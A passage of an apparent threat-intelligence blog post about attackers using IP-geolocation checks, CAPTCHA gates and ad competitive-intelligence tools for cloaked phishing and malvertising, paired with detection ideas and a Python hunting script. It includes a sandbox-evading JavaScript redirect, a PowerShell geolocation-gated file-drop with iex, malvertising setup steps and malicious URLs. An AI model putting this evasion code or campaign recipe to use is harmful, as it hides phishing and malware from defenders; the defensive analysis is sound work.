  let parsed = await raw_response.json();
  if (parsed["country_code"] == "US") {
    // proxy.is_tor / proxy.is_vpn are returned on subscription tiers that include proxy detection
    if (parsed.proxy?.is_tor === true || parsed.proxy?.is_vpn === true)
      document.location = 'error.html';        // VPN/Tor (common for sandboxes and analysts): error page
    else
      document.location = 'evilpage.html';     // U.S. visitor on a direct connection: malicious page
  } else {
    document.location = 'nothingburger.html';  // outside the target geography: innocuous page
  }
&lt;/script&gt;</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Though the example above only routes visitors to different pages based on their connection attributes, it can be surprisingly effective at thwarting automated analysis tools, since analysis sandboxes often egress through VPNs or from outside the targeted region. This sort of technique is particularly applicable to regional phishing attacks that target specific geo-dispersed companies or campaigns that target users in certain geographic regions.</span></p> <h3><span style="vertical-align: baseline;">Defending Against Attacks Leveraging IP Geolocation Utilities</span></h3> <p><span style="vertical-align: baseline;">While IP geolocation utilities commonly appear on legitimate websites, it is less likely that such a methodology would be used programmatically by non-browser processes on endpoints, such as individual workstations. 
This is good news for defenders, as detection and hunting efforts can primarily focus on correlating observed URL-based telemetry data with anomalous events in endpoint telemetry.</span></p> <p><span style="vertical-align: baseline;">For example, a simulated attack script can be seen in the following PowerShell code snippet using the ip2location.io service:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Ask ip2location.io where this host's public IP geolocates; &lt;key&gt; is the attacker's API key.
$Response = Invoke-WebRequest -UseBasicParsing -URI "https://api.ip2location.io/?key=&lt;key&gt;"
# IndexOf returns -1 when the substring is absent, so only a U.S. result reaches the payload stage.
if ($Response.Content.IndexOf('"country_code":"US"') -ge 0) {
    $EvilScript = 'echo "&lt;raw bytes of evil file to drop on disk&gt;" &gt;&gt; C:\TEMP\out.tmp'
    iex $EvilScript
}</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This script uses PowerShell to connect to ip2location.io, determine whether the host is connecting via a U.S.-based IP address, and, if so, drop the file “C:\TEMP\out.tmp” to disk. </span></p> <p><span style="vertical-align: baseline;">In network-based telemetry, the default User-Agent sent by the PowerShell Invoke-WebRequest cmdlet is </span><a href="https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4#-useragent" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">clearly identified</span></a><span style="vertical-align: baseline;">. Thus, a behavioral network detection for the PowerShell User-Agent connecting to ip2location.io could be created to identify this activity. 
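</span></p> <p><span style="vertical-align: baseline;">Both hunting ideas, the millisecond-scale pivot from bit.ly to a suspicious-TLD or file-sharing domain described in Table 1 and the PowerShell User-Agent reaching ip2location.io described here, can be written as rules over the same network telemetry. The following Python is an added example for illustration, not part of the original post and not Mandiant's tooling. It runs the two rules over a handful of constructed records (every timestamp, host name, domain and User-Agent string is made up), and the 500 ms correlation window, the suspicious-TLD list and the file-sharing domain list are assumptions standing in for what a defender would take from their own proxy categories and tuning.</span></p>

```python
"""Hunting rules for link-shortener pivots and PowerShell geolocation lookups.

Added example over constructed telemetry; not real data and not Mandiant code.
"""
from dataclasses import dataclass
from datetime import datetime

# Constructed sample telemetry: (timestamp, host, event kind, domain, user agent).
# Event kinds: "tls" = TLS Client Hello, "dns" = resolution request, "http" = proxy log entry.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:00.000Z", "ws-101", "tls", "bit.ly", ""),
    ("2024-05-01T10:00:00.120Z", "ws-101", "dns", "afakeloginpage.xyz", ""),
    ("2024-05-01T10:02:00.000Z", "ws-102", "tls", "bit.ly", ""),
    ("2024-05-01T10:02:00.090Z", "ws-102", "dns", "drive.google.com", ""),
    ("2024-05-01T10:02:00.300Z", "ws-102", "dns", "drive.usercontent.google.com", ""),
    ("2024-05-01T10:05:00.000Z", "ws-103", "tls", "bit.ly", ""),
    ("2024-05-01T10:05:09.000Z", "ws-103", "dns", "login-portal.top", ""),  # 9 s later: too slow
    ("2024-05-01T10:07:00.000Z", "ws-104", "http", "api.ip2location.io",
     "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1023"),
    ("2024-05-01T10:08:00.000Z", "ws-105", "http", "api.ip2location.io",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0"),
]

SHORTENERS = {"bit.ly"}
SUSPICIOUS_TLDS = {"xyz", "site", "top", "lol"}  # the non-standard TLDs called out in Table 1
FILE_SHARING_DOMAINS = {                          # assumed stand-in for a proxy "file sharing" category
    "drive.google.com", "drive.usercontent.google.com", "dropbox.com", "www.dropbox.com",
}
GEOLOCATION_SERVICES = {"api.ip2location.io"}


@dataclass
class Event:
    ts: datetime
    host: str
    kind: str
    domain: str
    user_agent: str = ""


def parse_events(rows):
    """Build time-ordered Event objects from raw tuples (ISO-8601 UTC timestamps)."""
    events = [
        Event(datetime.fromisoformat(ts.replace("Z", "+00:00")), host, kind, domain.lower(), ua)
        for ts, host, kind, domain, ua in rows
    ]
    return sorted(events, key=lambda e: e.ts)


def hunt_shortener_pivots(events, window_ms=500):
    """Rule 1 (Table 1): a shortener Client Hello followed on the same host, within window_ms,
    by a DNS request for a suspicious-TLD domain or a file-sharing domain."""
    findings = []
    for i, hello in enumerate(events):
        if hello.kind != "tls" or hello.domain not in SHORTENERS:
            continue
        for later in events[i + 1:]:
            delta_ms = (later.ts - hello.ts).total_seconds() * 1000
            if delta_ms > window_ms:
                break  # events are sorted, so nothing further can fall inside the window
            if later.host != hello.host or later.kind != "dns":
                continue
            if later.domain in FILE_SHARING_DOMAINS:
                reason = "file_sharing_after_shortener"
            elif later.domain.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS:
                reason = "suspicious_tld_after_shortener"
            else:
                continue
            findings.append({"host": hello.host, "shortener": hello.domain, "domain": later.domain,
                             "delta_ms": round(delta_ms), "reason": reason})
    return findings


def hunt_powershell_geolookups(events):
    """Rule 2: a PowerShell User-Agent (both the 'WindowsPowerShell/' and 'PowerShell/' forms
    contain the substring 'PowerShell/') talking to an IP geolocation API from an endpoint."""
    return [
        {"host": e.host, "domain": e.domain, "user_agent": e.user_agent,
         "reason": "powershell_geolocation_lookup"}
        for e in events
        if e.kind == "http" and e.domain in GEOLOCATION_SERVICES and "PowerShell/" in e.user_agent
    ]


def run_hunts(rows, window_ms=500):
    """Parse raw rows once and apply both rules; returns the combined findings list."""
    events = parse_events(rows)
    return hunt_shortener_pivots(events, window_ms) + hunt_powershell_geolookups(events)


if __name__ == "__main__":
    for finding in run_hunts(SAMPLE_EVENTS):
        print(finding)
```

<p><span style="vertical-align: baseline;">Run as a script it reports three shortener pivots (the .xyz login page and the two Google Drive hosts from the Table 1 scenarios) and one PowerShell geolocation lookup. The 9-second gap on ws-103 stays silent at 500 ms and only surfaces if the window is widened; that window is the knob that trades recall against noise in a real environment.</span></p> <p><span style="vertical-align: baseline;">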
While this is a fairly narrow detection, the concept can be widened by defenders based on the size of their environment and their level of noise tolerance.</span></p> <h3><span style="vertical-align: baseline;">Doing the CAPTCHA-cha Slide: Evading Detection with Bot Classification Tools</span></h3> <p><span style="vertical-align: baseline;">CAPTCHA, which is short for Completely Automated Public Turing test to tell Computers and Humans Apart, was developed to prevent bots and automated activity from accessing and interacting with web forms and hosted resources. Implementations of CAPTCHA technology, such as Google’s reCAPTCHA or Cloudflare’s Turnstile, are used as a security measure to filter out unwanted bot activity while permitting human users to access websites and interact with forms and other elements of a webpage (e.g., HTML buttons). Traditionally, CAPTCHA security challenges have required users to solve a visual puzzle or perform a brief interactive task. More recent implementations perform passive score-based detection to identify bot activity based on behavioral characteristics.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig8.max-1000x1000.png" alt="Evolution of reCAPTCHA"> </a> <figcaption class="article-image__caption "><p data-block-key="4lnyd">Figure 8: Evolution of reCAPTCHA</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While intended to address the issue of malicious activity, CAPTCHA technology has been co-opted for use by threat actors to evade detection and scanning of their malicious infrastructure and payloads by security tools (</span><a href="https://attack.mitre.org/techniques/T1633/001/" 
rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK T1633.001</span></a><span style="vertical-align: baseline;">). For example, threat actors have been observed using free CAPTCHA services to prevent dynamic access and detonation actions that are typically performed by email security technologies to determine if a URL is malicious. This provides threat actors with the ability to allow human users to access a phishing page while screening out programmatic activity and the usage of data transfer tools like cURL (Figure 9).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig9.max-1000x1000.png" alt="CAPTCHA victim flow"> </a> <figcaption class="article-image__caption "><p data-block-key="4fx9h">Figure 9: CAPTCHA victim flow</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant has tracked UNC5296 abusing Google Sites services as early as January 2024 to host CAPTCHA challenges that redirect users to download a ZIP archive. The ZIP archive contains a malicious LNK file masquerading as a PDF file from a financial institution that, once executed, leads to the deployment of either AZORULT or DANCEFLOOR. 
Mandiant has also identified </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/fin11-email-campaigns-precursor-for-ransomware-data-theft?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">FIN11</span></a><span style="vertical-align: baseline;"> using CAPTCHA challenges as part of a phishing campaign in June 2020 to deliver the FRIENDSPEAK downloader and MIXLABEL backdoor.</span></p> <h3><span style="vertical-align: baseline;">Defending Against Attacks Using Bot Classification Tools</span></h3> <p><span style="vertical-align: baseline;">CAPTCHA tools have an extensive, legitimate use on the Internet, which makes it challenging to detect when they’re being used for malicious purposes. CAPTCHA widgets are easily implemented within a website using a few lines of HTML to reference the corresponding JavaScript resource and a unique site key that’s associated with the user who registered the CAPTCHA challenge.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;reCAPTCHA Test&lt;/title&gt;
    &lt;script src="https://www.google.com/recaptcha/api.js"&gt;&lt;/script&gt;
    &lt;script&gt;
      // Called by the reCAPTCHA widget once the challenge is passed; redirects the visitor.
      function passRedirect() {
        window.location.href = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
      }
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;div class="g-recaptcha" data-sitekey="&lt;removed&gt;" data-callback="passRedirect"&gt;&lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When the CAPTCHA challenge is implemented within an intermediate webpage, defenders can use the network requests for the CAPTCHA JavaScript API files as potential detection or enrichment opportunities.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div 
style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">CAPTCHA Technology</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Network Requests</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Detection Strategy</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">reCAPTCHA v2</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00 - screening website accessed</span></p> <p><span style="vertical-align: baseline;">00:00:00 - www.google.com/recaptcha/api.js</span></p> <p><span style="vertical-align: baseline;">00:00:00 - www.gstatic.com/recaptcha/releases/vjbW55<br/>W42X033PfTdVf6Ft4q/recaptcha__en.js</span></p> <p><span style="vertical-align: baseline;">00:00:20 - www.google.com/recaptcha/api2/anchor?ar=1&amp;k=&lt;unique reCAPTCHA sitekey&gt;&amp;co=&lt;snip&gt;</span></p> <p><span style="vertical-align: baseline;">00:00:52 - redirection to website after passing CAPTCHA</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; 
padding: 16px;"> <p><span style="vertical-align: baseline;">Look for suspicious proxy or firewall events occurring within 1 second of requests for www.google.com and www.gstatic.com; refine further based on the URI(s) if TLS decryption is available. Potentially include a suspicious proxy or firewall event for the redirection domain occurring within 1 minute of the previous sequence.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cloudflare Turnstile</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">00:00:00 - screening website accessed</span></p> <p><span style="vertical-align: baseline;">00:00:00 - challenges.cloudflare.com/turnstile/v0/api.js</span></p> <p><span style="vertical-align: baseline;">00:00:20 - redirection to website after passing CAPTCHA</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Look for suspicious proxy or firewall events occurring within 1 second of a request for challenges.cloudflare.com.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Simulated CAPTCHA telemetry analysis</span></div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">A Real Jack-Ads: Stealing What Works for Loopholes and Profit</span></h2> <p><span style="vertical-align: baseline;">In practice, marketers have many variables to consider when running an ad campaign. 
There is the content of the ad itself (e.g., text, video, images), the demographics of the intended audience, the geolocation of where the ad will be displayed, and the time of day it will be displayed, among many other factors. Starting a new ad campaign often requires experimentation and refinement on the part of the marketers to find an ad “formula” that best aligns with the product or service they are trying to advertise. </span></p> <p><span style="vertical-align: baseline;">To get a head start on the process of digital advertising refinement, marketers can use competitive intelligence tools to see what ads their competitors are running. Depending on the tool, marketers can see keywords tied to their competition’s ads, the websites and applications the ad appeared on, media types associated with the ads (e.g., video, text, images), the landing pages users were shown after they clicked the ad, and many other notable advertising insights. One of the more well-known and robust tools for this includes </span><a href="https://www.adbeat.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AdBeat</span></a><span style="vertical-align: baseline;">. </span><a href="https://adstransparency.google.com/?region=CA" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google</span></a><span style="vertical-align: baseline;"> and </span><a href="https://www.facebook.com/ads/library/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Meta</span></a><span style="vertical-align: baseline;"> also have repositories. 
These Search Engine Marketing (SEM) tools can provide insights to threat actors looking to set up malicious or dubious advertising campaigns (</span><a href="https://attack.mitre.org/techniques/T1583/008/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">MITRE ATT&amp;CK Technique T1583.008</span></a><span style="vertical-align: baseline;">), including </span><a href="https://www.blackhatworld.com/seo/curacao-licensed-casino-advertising-with-their-own-domain-how-is-it-possible.1416621/post-16178266" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">advertisement geolocation</span></a><span style="vertical-align: baseline;"> and </span><a href="https://www.blackhatworld.com/seo/google-ads-gambling.1469082" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">effective keyword usage to circumvent Google Ads policies</span></a><span style="vertical-align: baseline;"> (Figure 10 and Figure 11).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig10.max-1000x1000.png" alt="Geo-location competitive intel tool functionality mentioned on the blackhatworld.com forum"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 10: Geolocation competitive intel tool functionality <a href="https://www.blackhatworld.com/seo/curacao-licensed-casino-advertising-with-their-own-domain-how-is-it-possible.1416621/post-16178266">mentioned on the blackhatworld.com forum</a></p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large 
h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig11.max-1000x1000.png" alt="Recommendation for competitive intel tools to assist with keyword refinement mentioned on the blackhatworld.com forum"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 11: Recommendation for competitive intel tools to assist with keyword refinement <a href="https://www.blackhatworld.com/seo/google-ads-gambling.1469082/post-16031082">mentioned on the blackhatworld.com forum</a></p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Crafting a Malvertising Victim Flow</span></h3> <p><span style="vertical-align: baseline;">To illustrate how competitive intelligence tools can be used by threat actors, we’ll explore the steps involved in planning, staging, and executing a malvertising campaign based on a real-life campaign that was investigated and actioned by Google Ads threat researchers. 
An example of a process threat actors can use to create malvertising campaigns is outlined in Figure 12.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig12.max-1000x1000.png" alt="Steps for setting up a malvertising campaign"> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 12: Steps for setting up a malvertising campaign</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Copying an Ad That Works <span style="vertical-align: baseline;">—</span> What Can Marketers See?</span></h3> <p><span style="vertical-align: baseline;">Much like their legitimate marketer counterparts, attackers looking to launch a malvertising campaign typically start by deciding which advertising keywords will attract the highest number of potential victims. Using keyword research features available in some Search Engine Marketing tools, a threat actor would be able to see how many users have historically interacted with ads related to specific keywords.</span></p> <p><span style="vertical-align: baseline;">For example, based on the data available within one competitive intelligence tool, in June 2024, an estimated 220,000 clicks originated from relevant ads associated with the keywords “advanced ip scanner” from multiple domains, including two — “ktgotit[.]com” and “advanced-ip-scanner[.]com” — that did not have any associated traffic in June 2024 but have historically been associated with the same keywords. 
Then, in correlating this data with historical ads featuring the domain ktgotit[.]com, the following ad could be identified as a viable one for mimicking by an attacker*:</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/weaponize-digital-analytics-tools-fig13a.png" alt="Ad snippet, ktgotit[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 13: Ad snippet, ktgotit[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; 
overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"><span style="vertical-align: baseline;">*Using one of the competitive intelligence tools, SEM data associated with ktgotit[.]com indicates that the ad in Figure 13 may have generated an estimated 3,000 visits at a cost of just under $7,000.</span></td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Typically, malicious advertisers employ several techniques in crafting their malicious ad content, including:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">Consciously avoiding any mention of legitimate brands in their advertising text to avoid keyword flags</span></li> <li role="presentation"><span style="vertical-align: baseline;">Creating a landing page with a domain name unrelated to the original product, service, or brand they are seeking to emulate</span></li> <li role="presentation"><span style="vertical-align: baseline;">Creating a “fake site” with a fictitious e-commerce brand</span></li> <li role="presentation"><span style="vertical-align: baseline;">Using cloaked pages, a technique that uses a combination of connection origination checks, device profiling, and page redirects between an initial landing page URL and its final destination in an attempt to conceal malicious activity</span></li> </ul> <p><span style="vertical-align: baseline;">Additional insights like whether other malvertising campaigns are making it past moderation filters with 
misspellings of an official or legitimate website or using entirely unrelated web domains can also be helpful to attackers. Attackers can use this information to craft a convincing landing page that is shown to the user immediately after the ad is clicked to entice the user to move further into the victim flow.</span></p> <h3><span style="vertical-align: baseline;">The Clone Wars</span></h3> <p><span style="vertical-align: baseline;">Armed with the strategic insights gathered from competitive intelligence tools, a would-be attacker could confirm that mirroring the victim flow previously used by the ktgotit[.]com malvertising campaign would be an effective strategy to expose their malicious ads to a high number of potential victims for a reasonable price. Thus, the attacker may then decide to:</span></p> <ul> <li role="presentation"><span style="vertical-align: baseline;">Purchase and configure hosting domains for their landing pages and payloads (the details of which are platform-dependent)</span></li> <li role="presentation"><span style="vertical-align: baseline;">Generate and host a landing page (competitive intelligence tools may integrate this in the service)</span></li> <li role="presentation"><span style="vertical-align: baseline;">Configure their cloaking page redirects and/or hosted distribution payloads (if applicable)</span></li> <li role="presentation"><span style="vertical-align: baseline;">Purchase advertising space for their keywords and deploy their ad (also platform-dependent)</span></li> </ul> <p><span style="vertical-align: baseline;">At that point all that would be left for the attacker to do is to watch their analytics traffic and wait for victims!</span></p> <h3><span style="vertical-align: baseline;">Epilogue: We Done ktgotit</span></h3> <p><span style="vertical-align: baseline;">In the case of the ad directing users to ktgotit[.]com (Figure 13), </span><a href="https://urlscan.io/result/a41ada0e-e952-44d6-bdbe-0d7516a1d3e3/" rel="noopener" 
target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">the malware author used an e-commerce “decoy” page</span></a><span style="vertical-align: baseline;"> with cloaking to circumvent traditional automated analysis techniques and to conceal the final destination URL serving the malicious content. However, even cloaking mechanisms can be defeated (much to the lament of the Romulans), and in the case of ktgotit[.]com, Google threat researchers were able to determine the final destination URL for the page was</span><span style="vertical-align: baseline;"> hxxps://aadvanced-ip-scanner[.]com.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig14a.max-1000x1000.png" alt="Landing page linked to ad, ktgotit[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 14: Landing page linked to ad, ktgotit[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig15a.max-1000x1000.png" alt="Recreated lure page shown only to connections that successfully pass the verification checks on ktgotit[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="wydvv">Figure 15: Recreated lure page shown only to connections that successfully pass the verification checks on ktgotit[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In this scenario, the "Free Download" link 
in Figure 15 led to a download for a malicious archive file named “</span><span style="vertical-align: baseline;">Advanced_IP_Scanner_v.3.5.2.1.zip” (MD5: “5310d6b73d19592860e81e4e3a5459eb”) from the URL “hxxps://britanniaeat[.]com/wp-includes/Advanced_IP_Scanner_v.3.5.2.1.zip”.</span></p> <h3><span style="vertical-align: baseline;">Defending Against Advertising Attacks</span></h3> <p><span style="vertical-align: baseline;">Ad networks should aim to respond quickly to new abuse tactics. Once an abuse methodology is known by one threat actor, it will soon become known by many.</span></p> <p><span style="vertical-align: baseline;">For enterprises, an elegantly simple and proactive solution would be to </span><span style="vertical-align: baseline;">consider elevating your environment’s current default browser security settings for everyday browsing. Most modern browsers seek to optimize a balance between usability and security when it comes to automated protective measures enabled by default (such as in </span><a href="https://support.google.com/chrome/answer/9890866" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google SafeBrowsing</span></a><span style="vertical-align: baseline;">). For some enterprise environments these can be elevated past default levels without much noticeable impact to overall user experience.</span></p> <p><span style="vertical-align: baseline;">For individual users, when clicking on ads or links in ads, users should double-check the website address (URL) of the destination to make sure it matches the company or product in the ad and doesn’t contain typos. This is especially important on phones where the URL bar might be hidden. In the example shown in Figure 13, the URL for the ad was ”ktgotit[.]com” and the landing page content matched the domain shown in the ad (i.e., ktgotit). 
Yet, the content of the benign landing page showed dubiously formatted product details for loosely related products that all purported to be affiliated with different manufacturers, and the content of the malicious page (protected by cloaking mechanisms) did not have a domain that matched the one shown in the ad (Figure 13).</span></p> <p><span style="vertical-align: baseline;">Users are also encouraged to double-check URLs prior to downloading files from domains that were sponsored by web advertisements. </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/detecting-disrupting-malvertising-backdoors/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">As demonstrated in Mandiant's "Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising Campaign Distributing Backdoors,"</span></a><span style="vertical-align: baseline;"> users were led to believe the files they were downloading were affiliated with unclaimed funds from the “Treasury Department.”</span></p> <p><span style="vertical-align: baseline;">Google encourages users to report any ads they think may violate their policies or harm users so they can review and take action as needed. 
This article contains more guidance on </span><a href="https://support.google.com/google-ads/answer/7660847?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">how to report ads</span></a><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Indicators of Compromise</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table style="width: 99.9641%;"><colgroup><col style="width: 36.8483%;"/><col style="width: 
